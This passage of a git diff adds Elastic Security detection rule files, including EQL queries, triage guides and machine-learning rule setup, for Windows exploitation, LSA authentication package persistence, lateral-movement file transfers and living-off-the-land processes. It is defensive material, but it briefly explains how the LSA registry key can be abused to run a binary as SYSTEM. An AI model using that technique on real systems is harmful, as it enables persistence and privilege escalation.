b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json new file mode 100644 index 00000000000..2f5dff20afe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Executable File Creation by a System Critical Process", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json new file mode 100644 index 00000000000..06df4226ded --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Executable File Creation by a System Critical Process", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json new file mode 100644 index 00000000000..5116c17fabb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries can use the autostart mechanism provided by the Local Security Authority (LSA) authentication packages for privilege escalation or persistence by placing a reference to a binary in the Windows registry. The binary will then be executed by SYSTEM when the authentication packages are loaded.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential LSA Authentication Package Abuse", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\"\n ) and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json new file mode 100644 index 00000000000..7201319a122 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an abnormal volume of remote files shared on the host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Attackers might perform multiple small transfers to match normal egress activity in the network, to evade detection.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_count_remote_file_transfer", + "name": "Spike in Remote File Transfers", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "e9b0902b-c515-413b-b80b-a8dcebc81a66", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e9b0902b-c515-413b-b80b-a8dcebc81a66_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json new file mode 100644 index 00000000000..9466b14b768 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_parent", + "name": "Unusual Process Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json new file mode 100644 index 00000000000..f07070f56fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_parent", + "name": "Unusual Process Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", 